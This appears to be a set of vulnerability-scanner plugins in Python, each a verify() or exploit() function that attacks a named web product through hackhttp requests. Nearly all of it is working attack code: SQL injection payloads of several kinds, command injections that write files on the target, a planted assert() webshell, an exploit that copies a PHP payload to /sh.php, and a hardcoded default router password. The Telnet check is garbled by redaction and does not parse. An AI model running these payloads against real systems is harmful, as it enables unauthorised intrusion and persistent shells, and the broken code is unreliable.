def verify(self):
    """Time-based blind SQL injection check for E-mobile ``diarydo.php``.

    Sends a baseline GET (``diary_id=1``) and a GET whose ``diary_id`` is
    ``sleep(5)``, timing each. The target is reported when both answer 200,
    the sleep request took longer than the baseline and took more than 5 s.
    Any exception is logged through ``self.output.info`` and swallowed.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()

        def timed_get(url):
            # One GET; returns (status code, elapsed seconds).
            started = time.time()
            status, _head, _body, _err, _final = hh.http(url)
            return status, time.time() - started

        base_status, base_elapsed = timed_get(
            self.target + '/E-mobile/diarydo.php?diff=reply&diary_id=1')
        sleep_status, sleep_elapsed = timed_get(
            self.target + '/E-mobile/diarydo.php?diff=reply&diary_id=sleep(5)')

        # The baseline comparison filters out a host that is simply slow;
        # the absolute 5 s bound ties the delay to the injected sleep.
        slower = sleep_elapsed > base_elapsed and sleep_elapsed > 5
        if base_status == 200 and sleep_status == 200 and slower:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Boolean-based SQL injection check for the NC iufo ``UnitTableRefAction``.

    Posts two otherwise identical bodies whose ``refSearchValue`` differs only
    in the injected comparison (``1=1`` vs ``1=2``) and counts the
    ``<tr id='sortItem'`` rows in each response. A differing row count with
    both responses at 200 is reported. Exceptions are logged and swallowed.
    Reference: wooyun-2014-060988.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Refer:http://www.wooyun.org/bugs/wooyun-2014-060988
        hh = hackhttp.hackhttp()
        # NOTE(review): "¶m_orgpk" looks like an HTML-entity mangling of
        # "&param_orgpk" introduced when this file was exported — confirm
        # against the repository before relying on this URL.
        url = self.target + "/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute"
        body_template = "TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=%27or+1%3D{}--"
        status_true, _h1, page_true, _e1, _ = hh.http(url, post=body_template.format(1))
        status_false, _h2, page_false, _e2, _ = hh.http(url, post=body_template.format(2))
        if status_true == 200 and status_false == 200:
            row_re = re.compile("<tr\s*id='sortItem'")
            rows_true = len(row_re.findall(page_true))
            rows_false = len(row_re.findall(page_false))
            if rows_true != rows_false:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Boolean-based SQL injection check for ``showkbxx.asp`` / ``shownews.asp``.

    For each path, appends ``OR 1=1`` and ``OR 1=2`` to ``id=-1`` and compares
    the ``<div`` occurrences of the two pages; a difference with both
    responses at 200 is reported (once per matching path, no early exit).
    Exceptions are logged and swallowed.
    References: wooyun-2010-090874, wooyun-2010-090451.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer:http://www.wooyun.org/bugs/wooyun-2010-090874
        # refer:http://www.wooyun.org/bugs/wooyun-2010-090451
        hh = hackhttp.hackhttp()
        paths = ['/showkbxx.asp?id=-1', '/shownews.asp?id=-1']
        suffix_true = '%20OR%201%3D1'
        suffix_false = '%20OR%201%3D2'
        for path in paths:
            status_true, _h1, page_true, _e1, _ = hh.http(self.target + path + suffix_true)
            status_false, _h2, page_false, _e2, _ = hh.http(self.target + path + suffix_false)
            # Lists of identical '<div' matches: inequality means the counts differ.
            divs_true = re.findall('<div', page_true)
            divs_false = re.findall('<div', page_false)
            if status_true == 200 and status_false == 200 and divs_true != divs_false:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Boolean-based SQL injection check for ``PubInfo/ldxx.asp?QryId``.

    For each candidate path, requests ``' or '1'='1`` and ``' or '1'='2``
    variants; the target is reported when the first answers 500 without
    ``gray.gif`` in the body and the second answers 200 with it.
    Exceptions are logged and swallowed. Reference: wooyun-2010-078982.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer:http://www.wooyun.org/bugs/wooyun-2010-078982
        hh = hackhttp.hackhttp()
        paths = ['/PubInfo/ldxx.asp?QryId=1', '/web/PubInfo/ldxx.asp?QryId=1']
        tail_true = '%27%20or%20%271%27%3D%271'
        tail_false = '%27%20or%20%271%27%3D%272'
        for path in paths:
            status_true, _h1, page_true, _e1, _ = hh.http(self.target + path + tail_true)
            status_false, _h2, page_false, _e2, _ = hh.http(self.target + path + tail_false)
            # The marker image is expected only on the "false" page.
            marker_flipped = 'gray.gif' not in page_true and 'gray.gif' in page_false
            if status_true == 500 and status_false == 200 and marker_flipped:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Command injection check for ``/acc/network/redial_pppoe.php``.

    Not side-effect free: the first request's ``wan`` parameter carries a shell
    command that writes a marker file (``test.php``) on the target; the second
    request fetches that file and the target is reported when the marker text
    comes back. The file is never removed. Exceptions are logged and swallowed.
    Reference: wooyun-2015-0117616.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # ref http://www.wooyun.org/bugs/wooyun-2015-0117616
        hh = hackhttp.hackhttp()
        arg = self.target
        # NOTE(review): this leaves test.php behind on the target; a verify()
        # step is normally expected to be non-destructive.
        payload = '/acc/network/redial_pppoe.php?wan=%20|%20echo%20testvul%20>%20test.php%20|'
        target = arg + payload
        code, head, res, errcode, _ = hh.http(target)
        # Fetch the file the injected command is expected to have created.
        payload = '/acc/network/test.php'
        target = arg + payload
        code, head, res, errcode, _ = hh.http(target)
        if 'testvul' in res:
            # security_hole(target)
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Time-based blind SQL injection check for ``checklogin.asp``.

    Posts a plain login body and then one whose ``uid`` carries a
    ``WAITFOR DELAY '0:0:5'``; the target is reported when the second
    request takes more than 3 s longer than the first. Response codes are
    not inspected. Exceptions are logged and swallowed.
    Reference: wooyun-2010-0107850.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer:http://www.wooyun.org/bugs/wooyun-2010-0107850
        hh = hackhttp.hackhttp()
        login_url = self.target + '/checklogin.asp'
        plain_body = 'uid=11111111&pwd=11111&imageField2.x=32&imageField2.y=7'
        delay_body = 'uid=11111111%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&pwd=11111&imageField2.x=32&imageField2.y=7'
        before_plain = time.time()
        _c1, _h1, _r1, _e1, _ = hh.http(login_url, plain_body)
        before_delay = time.time()
        _c2, _h2, _r2, _e2, _ = hh.http(login_url, delay_body)
        after_delay = time.time()
        plain_elapsed = before_delay - before_plain
        delay_elapsed = after_delay - before_delay
        # Threshold is below the injected 5 s to tolerate timing noise.
        if delay_elapsed - plain_elapsed > 3:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Union-based SQL injection check for ``modules/pdflist.aspx?info_id``.

    Requests two UNION payloads (a ``CHAR()``-concatenation form and a
    ``CHR()||`` form with ``FROM DUAL``) that each spell out the marker
    ``qbpkqfaLqmHXluMqpxqq``; the target is reported for every payload whose
    response body contains that marker. Exceptions are logged and swallowed.
    Reference: wooyun-2010-0116142.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer:http://www.wooyun.org/bugs/wooyun-2010-0116142
        hh = hackhttp.hackhttp()
        marker = 'qbpkqfaLqmHXluMqpxqq'
        query_strings = (
            '/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28112%29%2bCHAR%28107%29%2bCHAR%28113%29%2bCHAR%28102%29%2bCHAR%2897%29%2bCHAR%2876%29%2bCHAR%28113%29%2bCHAR%28109%29%2bCHAR%2872%29%2bCHAR%2888%29%2bCHAR%28108%29%2bCHAR%28117%29%2bCHAR%2877%29%2bCHAR%28113%29%2bCHAR%28112%29%2bCHAR%28120%29%2bCHAR%28113%29%2bCHAR%28113%29%2CNULL%2CNULL%2CNULL--',
            '/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28102%29%7C%7CCHR%2897%29%7C%7CCHR%2876%29%7C%7CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%2872%29%7C%7CCHR%2888%29%7C%7CCHR%28108%29%7C%7CCHR%28117%29%7C%7CCHR%2877%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%2CNULL%2CNULL%2CNULL%20FROM%20DUAL--',
        )
        for query in query_strings:
            _status, _head, page, _err, _ = hh.http(self.target + query)
            # Status code is intentionally not checked; only the marker counts.
            if marker in page:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Boolean-based SQL injection check for ``/opac/ckmarc.jsp`` (POST ``kzh``).

    Posts ``AND 1=1`` and ``AND 1=2`` variants of the same ``kzh`` value and
    compares the ``</td>`` occurrences in the two bodies; a difference with
    both responses at 200 is reported. Exceptions are logged and swallowed.
    Reference: wooyun-2010-0132188.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer:http://www.wooyun.org/bugs/wooyun-2010-0132188
        hh = hackhttp.hackhttp()
        endpoint = self.target + '/opac/ckmarc.jsp'
        body_true = 'kzh=zyk0040640%27%20AND%201%3D1%20AND%20%27jyNX%27%3D%27jyNX'
        body_false = 'kzh=zyk0040640%27%20AND%201%3D2%20AND%20%27jyNX%27%3D%27jyNX'
        status_true, _h1, page_true, _e1, _ = hh.http(endpoint, body_true)
        status_false, _h2, page_false, _e2, _ = hh.http(endpoint, body_false)
        # Lists of identical '</td>' matches: inequality means the counts differ.
        cells_true = re.findall('</td>', page_true)
        cells_false = re.findall('</td>', page_false)
        if status_true == 200 and status_false == 200 and cells_true != cells_false:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Error-based SQL injection check for the ``csccmise`` ASP pages.

    Requests ``jczp.asp`` and ``jctxx.asp`` with ``jcid=1 or 1=@@version--``
    and reports the target for every response (non-zero status) whose body
    contains ``Microsoft SQL Server``, i.e. the conversion error echoed the
    server banner. Exceptions are logged and swallowed.
    References: wooyun-2010-0129390, wooyun-2010-0129392.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # http://www.wooyun.org/bugs/wooyun-2010-0129390
        # http://www.wooyun.org/bugs/wooyun-2010-0129392
        hh = hackhttp.hackhttp()
        # Only the csccmise/ variants are probed here.
        probe_urls = [
            self.target + '/csccmise/jczp.asp?jcid=1%20or%201=@@version%20--',
            self.target + '/csccmise/jctxx.asp?jcid=1%20or%201=@@version%20--',
        ]
        for probe_url in probe_urls:
            status, _head, page, _err, _ = hh.http(probe_url)
            # code 0 is hackhttp's "no response" indicator, skipped here.
            if status != 0 and 'Microsoft SQL Server' in page:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Unauthenticated log export check for ``/cgi-pub/exportdata.cgi``.

    Requests the intrusion (type 1), system (type 3) and block (type 12) log
    exports and reports the target for every 200 response whose body contains
    both ``Attack Time`` and ``Action``. Exceptions are logged and swallowed.
    References: wooyun-2015-098450, wooyun-2015-0134150.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # info:http://www.wooyun.org/bugs/wooyun-2015-098450\http://www.wooyun.org/bugs/wooyun-2015-0134150
        hh = hackhttp.hackhttp()
        export_paths = (
            # intrusion log
            '/cgi-pub/exportdata.cgi?type=1&begintime=20150101&endtime=20150102',
            # system log
            '/cgi-pub/exportdata.cgi?type=3&begintime=20150101&endtime=20150102',
            # block log
            '/cgi-pub/exportdata.cgi?type=12&begintime=20150101&endtime=20151218',
        )
        for export_path in export_paths:
            status, _head, page, _err, _ = hh.http(self.target + export_path)
            looks_like_log = 'Attack Time' in page and 'Action' in page
            if status == 200 and looks_like_log:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Time-based blind SQL injection check for ``DeMandTest.aspx?PLCNr``.

    Times a GET of the target root, then a GET whose ``PLCNr`` carries
    ``WAITFOR DELAY '0:0:6'``. Reports when the root answers 200 in under
    2 s and the injected request answers 500, takes longer than the
    baseline and more than 5 s. Exceptions are logged and swallowed.
    Reference: shuimugan bug 102603.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # https://bugs.shuimugan.com/bug/view?bug_no=102603
        hh = hackhttp.hackhttp()
        root = self.target

        def timed_get(url):
            # One GET; returns (status code, elapsed seconds).
            started = time.time()
            status, _head, _body, _err, _final = hh.http(url)
            return status, time.time() - started

        base_status, base_elapsed = timed_get(root)
        delay_status, delay_elapsed = timed_get(
            root + "/DeMandTest.aspx?B=0&Month=1&PLCNr=5;WAITFOR%20DELAY%20'0:0:6'--&MeterID=1")
        # A fast baseline (< 2 s) guards against attributing general
        # slowness to the injected delay.
        baseline_ok = base_status == 200 and base_elapsed < 2
        delayed_ok = (delay_status == 500 and delay_elapsed > base_elapsed
                      and delay_elapsed > 5)
        if baseline_ok and delayed_ok:
            self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Union-based SQL injection check for ``pubinfo/Moreysxk.asp?Qryxmmc``.

    Appends a UNION SELECT that evaluates ``hashbytes('MD5','1234')`` to each
    candidate path and reports the target for every 200 response whose body
    contains the expected hex digest. Exceptions are logged and swallowed.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        hh = hackhttp.hackhttp()
        expected_digest = '0x81dc9bdb52d04dc20036dbd8313ed055'
        paths = ['/pubinfo/Moreysxk.asp?Qryxmmc=111', '/web/pubinfo/Moreysxk.asp?Qryxmmc=111']
        union_tail = '%25%27%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271234%27%29%29%2C6%2C7%2C8%2C9--%20%26Qryxkzh%3D1'
        for path in paths:
            status, _head, page, _err, _ = hh.http(self.target + path + union_tail)
            if status == 200 and expected_digest in page:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Command injection check for ``/direct/polling/CommandsPolling.php``.

    Executes a command on the target: ``cmdParam`` is ``qq.com,ifconfig`` so
    the ``ping`` command runs ``ifconfig`` as well. The first POST is used to
    recover a file path from the response, the second repeats the request with
    that path as ``filename``; a 200 whose body contains ``Ethernet HWaddr`` is
    reported. Exceptions are logged and swallowed.
    Reference: wooyun-2015-0140998.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # info:http://www.wooyun.org/bugs/wooyun-2015-0140998
        hh = hackhttp.hackhttp()
        url = self.target + '/direct/polling/CommandsPolling.php'
        postdata = "command=ping&filename=&cmdParam=qq.com,ifconfig"
        code, head, res, errcode, _ = hh.http(url, post=postdata)
        # Slice from the first '/' up to and including 'qq.com' and drop
        # backslashes; presumably a JSON-escaped path in the response.
        # NOTE(review): if either marker is missing, find() returns -1 and the
        # slice silently yields an unrelated substring — confirm expected output.
        filepath = res[res.find('/'):res.find('qq.com') + 6].replace(
            '\\', '')
        postdata = "command=ping&filename=%s&cmdParam=qq.com,ifconfig" % filepath
        code, head, res, errcode, _ = hh.http(url, post=postdata)
        if code == 200 and 'Ethernet HWaddr' in res:
            # security_hole(url)
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Remote code execution check via ``search.php`` template injection.

    Executes code on the target: the first GET plants ``assert($_POST[yu])``
    through the ``title`` parameter, the second POSTs ``yu=phpinfo();`` to
    ``/do/jf.php``. A 500 response containing both ``phpinfo()`` and
    ``AUTH_PASSWORD`` is reported. Exceptions are logged and swallowed.
    Reference: wooyun-2015-0122599.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # ref http://www.wooyun.org/bugs/wooyun-2015-0122599
        hh = hackhttp.hackhttp()
        # NOTE(review): this persists an evaluable expression in the target's
        # admin hack configuration; it is not a read-only probe.
        payload = '/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=../../admin/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${@assert($_POST[yu])}'
        url1 = self.target + payload
        url2 = self.target + '/do/jf.php'
        post = 'yu=phpinfo();'
        code, head, res, errcode, _ = hh.http(url1)
        code, head, res, errcode, _ = hh.http(url2, post=post)
        if code == 500 and 'phpinfo()' in res and 'AUTH_PASSWORD' in res:
            # security_hole(url2)
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """SQL injection to file write check for Weaver e-office ``group_xml.php``.

    Writes to the target: the base64-encoded ``par`` value carries a UNION
    SELECT ... INTO OUTFILE that is meant to drop a PHP file under
    ``../webroot/``; the file is then fetched and a 200 containing the md5 of
    ``1`` is reported. Exceptions are logged and swallowed.
    Reference: wooyun-2010-0128007.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer: http://www.wooyun.org/bugs/wooyun-2010-0128007
        hh = hackhttp.hackhttp()
        arg = self.target
        md5_1 = 'c4ca4238a0b923820dcc509a6f75849b'
        # Random suffix so repeated runs do not collide on one filename.
        filename = 'wtFtw' + str(random.randint(111, 999)) + '.php'
        # NOTE(review): the literal reads '(unknown)' where the .format() call
        # expects a '{filename}' placeholder, so as stored the format is a
        # no-op and the outfile path does not contain `filename` — likely an
        # export artifact; confirm against the repository.
        payload = '[group]:[1]|[groupid]:[1 union select 0x3c3f706870206563686f206d64352831293b203f3e,2,3,4,5,6,7,8 into outfile \'../webroot/(unknown)\']'.format(
            filename=filename)
        # Python 2 semantics: b64encode of a str; on Python 3 this needs bytes.
        payload = base64.b64encode(payload)
        # print payload
        url = arg + '/inc/group_user_list/group_xml.php?par=' + payload
        code, head, res, err, _ = hh.http(url)
        if code == 200:
            code, head, res, err, _ = hh.http(arg + '/' + filename)
            if (code == 200) and (md5_1 in res):
                # security_hole('weaver e-office getshell: ' + url)
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Telnet default-credential check.

    Opens a Telnet session to the target on port 23, sends a username and
    password, then issues ``?`` and reports the target when the help output
    contains both ``->`` and ``exec``. Telnet errors are swallowed silently by
    the inner ``except``; anything else is logged via ``self.output.info``.

    NOTE(review): this block does not parse as stored. The credential
    literals below were redacted to ``'******'`` and the redaction left
    unbalanced quotes on the ``password`` line and in the ``read_until``
    prompt; the original values are not recoverable from this page.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # hh is created but never used; the check below is Telnet only.
        hh = hackhttp.hackhttp()
        # NOTE(review): self.target was just joined with base_path, so a URL
        # with a path is handed to Telnet as the host — presumably unintended.
        arg = self.target
        port = 23
        # Shadows the `time` module within this method (used only as a timeout).
        time = 5
        user = '******'
        password = '******'%s\') = %u'
        finish = '->'
        try:
            t = telnetlib.Telnet(arg, port, timeout=time)
            t.write(user + '\n')
            t.read_until('password: '******'\n')
            str1 = t.read_until(finish)
            t.write("?\n")
            # Shadows the builtin `str` for the rest of this block.
            str = t.read_until(finish)
            t.close()
            if ('->' in str) and ('exec' in str):
                # security_hole(arg)
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
        except Exception as e:
            # Connection/auth failures are treated as "not vulnerable" and dropped.
            pass
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def exploit(self):
    """Unauthenticated access to ``/manager/config_SSO.php`` leading to a shell.

    Destructive: after confirming the page is reachable without auth, it
    POSTs a PHP payload into the SSO template, then a second POST whose
    ``os_name`` carries a shell command that copies that template to
    ``/sh.php`` under the web root. The target is reported with the shell URL
    when ``/sh.php`` returns the md5 of ``3.14``. Exceptions are logged and
    swallowed. Reference: wooyun-2014-077033.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # wooyun-2014-077033
        hh = hackhttp.hackhttp()
        arg = self.target
        path = '/manager/config_SSO.php'
        target = arg + path
        code, head, res, errcode, _ = hh.http(target)
        # Markers from the SSO config form indicate the page is served without auth.
        if code == 200 and ('os_name' in res) and ('telnet_os_login_mes' in res):
            # security_warning("Unauthorized access"+target)
            shell_data = "type_mode=5201314<?php echo md5(3.14);?>&os_name=HP_11&config_flag=1"
            code, head, res, errcode, _ = hh.http(target, shell_data)
            # NOTE(review): this writes sh.php into the target's web root and
            # never cleans it up.
            exec_data = "os_name=a%20|cp%20/usr/local/keyou/Config/sso/HP_11/Template.cnf%20/usr/local/apache2/htdocs/project/www/sh.php%20|&config_flag=1"
            code, head, res, errcode, _ = hh.http(target, exec_data)
            target = arg + '/sh.php'
            code, head, res, errcode, _ = hh.http(target)
            if code == 200 and '4beed3b9c4a886067de0e3a094246f78' in res:
                # security_hole("getshell:"+target)
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,获取shell为:{shell}'.format(
                        target=self.target, name=self.vuln.name, shell=target))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Error-based SQL injection check for three ``/WebPages/*.php`` endpoints.

    Each URL injects ``extractvalue(0x1, concat(0x23, (select md5(1))))`` so a
    vulnerable backend echoes the digest of ``1`` in its XPath error. The
    target is reported for every 200 response containing the digest prefix.
    Exceptions are logged and swallowed.
    References: wooyun-2014-058932, -058971, -058988, -077810.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # refer: http://www.wooyun.org/bugs/wooyun-2014-058932
        # refer: http://www.wooyun.org/bugs/wooyun-2014-058971
        # refer: http://www.wooyun.org/bugs/wooyun-2014-058988
        # refer: http://www.wooyun.org/bugs/wooyun-2014-077810
        hh = hackhttp.hackhttp()
        root = self.target
        # Prefix of md5('1'); the error message may truncate the value.
        digest_prefix = 'c4ca4238a0b923820dcc509a6f75849'
        probe_urls = (
            root + '/WebPages/history.php?uid=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))',
            root + '/WebPages/applyhardware.php?action=applyhardware&hard_user=test%2527%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23',
            root + '/WebPages/singlelogin.php?loginId=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23&submit=t',
        )
        for probe_url in probe_urls:
            status, _head, page, _err, _ = hh.http(probe_url)
            if status == 200 and digest_prefix in page:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
    """Command injection check for ``/acc/debug/bytecache_run_action.php``.

    Not side-effect free: the ``engine`` parameter carries a shell command that
    writes a marker file (``a1.php``) on the target; the second request fetches
    it and the target is reported when the marker text comes back. The file is
    never removed. Exceptions are logged and swallowed.
    Reference: wooyun-2015-0117621.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # ref http://www.wooyun.org/bugs/wooyun-2015-0117621
        hh = hackhttp.hackhttp()
        arg = self.target
        # NOTE(review): leaves a1.php behind on the target.
        payload = "/acc/debug/bytecache_run_action.php?action=2&engine=%20|%20echo%20testvultest3%20>%20a1.php%20|%20&ipfilter=10"
        target = arg + payload
        code, head, res, errcode, _ = hh.http(target)
        # Fetch the file the injected command is expected to have created.
        payload = '/acc/debug/a1.php'
        target = arg + payload
        code, head, res, errcode, _ = hh.http(target)
        if 'testvultest3' in res:
            # security_hole(target)
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self):
    """Default super-admin credential check for a ZTE-style router login page.

    Fetches the target root to extract the ``Frm_Logintoken`` value, then POSTs
    the built-in ``telecomadmin`` credentials with that token back to the root.
    A 200 whose body embeds ``src="template.gch"`` (the post-login frame) is
    reported. Exceptions are logged and swallowed.
    Reference: wooyun-2014-049406.
    """
    prefix = self.target.rstrip('/')
    suffix = self.get_option('base_path').lstrip('/')
    self.target = prefix + '/' + suffix
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Refer:http://www.wooyun.org/bugs/wooyun-2014-049406
        hh = hackhttp.hackhttp()
        root = self.target
        # Step 1: pull the anti-CSRF login token out of the landing page.
        _c0, _h0, landing_page, _e0, _f0 = hh.http(root)
        token_re = re.compile(
            'document\.getElementById\("Frm_Logintoken"\).value = "(\d{5,8})";')
        found = token_re.search(landing_page)
        login_token = found.group(1) if found else ""
        # NOTE(review): logout_url is built but never requested; the POST below
        # goes to the root URL. Kept as in the original — confirm intent.
        logout_url = root + "/getpage.gch?pid=1001&logout=1"
        login_body = "Username=telecomadmin&Password=nE7jA%255m&Frm_Logintoken=" + login_token
        # proxy=('127.0.0.1',8080)
        status, _head, page, _err, _final = hh.http(root, post=login_body)
        if status == 200 and "src=\"template.gch\"" in page:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as exc:
        self.output.info('执行异常{}'.format(exc))
def verify(self):
